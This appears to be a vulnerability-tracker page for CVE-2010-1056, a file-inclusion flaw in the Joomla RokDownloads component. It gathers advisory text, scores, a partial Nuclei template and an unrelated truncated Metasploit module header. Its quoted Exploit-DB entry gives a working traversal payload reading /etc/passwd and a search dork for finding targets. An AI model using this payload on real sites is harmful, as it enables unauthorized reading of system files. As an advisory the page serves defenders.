CVE-2010-1056
published 2010-03-23CVE-2010-1056: Directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute…
PriorityP348medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
11.41%
95.5th percentile
Directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
Affected
10 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| rockettheme | com_rokdownloads | <= 1.0 | — |
| rockettheme | com_rokdownloads | — | — |
| rockettheme | com_rokdownloads | — | — |
| rockettheme | com_rokdownloads | — | — |
| rockettheme | com_rokdownloads | — | — |
| rockettheme | com_rokdownloads | — | — |
| rockettheme | com_rokdownloads | — | — |
| rockettheme | com_rokdownloads | — | — |
| rockettheme | com_rokdownloads | — | — |
| rockettheme | com_rokdownloads | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
VulDB
Rockettheme Com Rokdownloads up to 0.90 index.php controller path traversal (EDB-11760 / Nessus ID 43636)
vuldb·2026-05-03·CVSS 6.8
CVE-2010-1056 [MEDIUM] Rockettheme Com Rokdownloads up to 0.90 index.php controller path traversal (EDB-11760 / Nessus ID 43636)
A vulnerability was found in Rockettheme Com Rokdownloads up to 0.90. It has been declared as problematic. This affects an unknown part of the file index.php. The manipulation of the argument controller results in path traversal.
This vulnerability is identified as CVE-2010-1056. The attack can be executed remotely. Additionally, an exploit exists.
It is recommended to upgrade the affected component.
GHSA
GHSA-7gjv-7778-36m8: Directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1
ghsa_unreviewed·2022-05-02
CVE-2010-1056 [MEDIUM] CWE-22 GHSA-7gjv-7778-36m8: Directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1
Directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
No detection rules found.
Exploit-DB
QuickTime Streaming Server - 'parse_xml.cgi' Remote Execution (Metasploit)
exploitdb·2010-07-03
CVE-2003-0050 QuickTime Streaming Server - 'parse_xml.cgi' Remote Execution (Metasploit)
QuickTime Streaming Server - 'parse_xml.cgi' Remote Execution (Metasploit)
---
##
# $Id: qtss_parse_xml_exec.rb 9669 2010-07-03 03:13:45Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'QuickTime Streaming Server parse_xml.cgi Remote Execution',
'Description' => %q{
The QuickTime Streaming Server contains a CGI script that is vulnerable
to metacharacter injection, allow arbitrary commands to be executed as root.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9669 $',
'References' =>
[
[ 'OSVDB', '1056
Exploit-DB
Joomla! Component com_rokdownloads - Local File Inclusion
exploitdb·2010-03-15
CVE-2010-1056 Joomla! Component com_rokdownloads - Local File Inclusion
Joomla! Component com_rokdownloads - Local File Inclusion
---
####################################################################
.:. Author : AtT4CKxT3rR0r1ST [[email protected]]
.:. Team : Sec Attack Team
.:. Home : www.sec-attack.com/vb
.:. Script : Joomla Component com_rokdownloads
.:. Bug Type : Local File Inclusion [LFI]
.:. Dork : inurl:"com_rokdownloads"
####################################################################
===[ Exploit ]===
www.site.com/index.php?option=com_rokdownloads&controller=[LFI]
www.site.com/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00
####################################################################
Nuclei
Joomla! Component com_rokdownloads - Local File Inclusion
nuclei·CVSS 6.8
CVE-2010-1056 [MEDIUM] Joomla! Component com_rokdownloads - Local File Inclusion
Joomla! Component com_rokdownloads - Local File Inclusion
A directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
Template:
id: CVE-2010-1056
info:
name: Joomla! Component com_rokdownloads - Local File Inclusion
author: daffainfo
severity: medium
description: A directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
reme
http://osvdb.org/62972http://packetstormsecurity.org/1003-exploits/joomlarokdownloads-lfi.txthttp://secunia.com/advisories/38982http://www.exploit-db.com/exploits/11760http://www.rockettheme.com/extensions-updates/638-rokdownloads-10-releasedhttp://www.securityfocus.com/bid/38741https://exchange.xforce.ibmcloud.com/vulnerabilities/56898http://osvdb.org/62972http://packetstormsecurity.org/1003-exploits/joomlarokdownloads-lfi.txthttp://secunia.com/advisories/38982http://www.exploit-db.com/exploits/11760http://www.rockettheme.com/extensions-updates/638-rokdownloads-10-releasedhttp://www.securityfocus.com/bid/38741https://exchange.xforce.ibmcloud.com/vulnerabilities/56898
2010-03-23
Published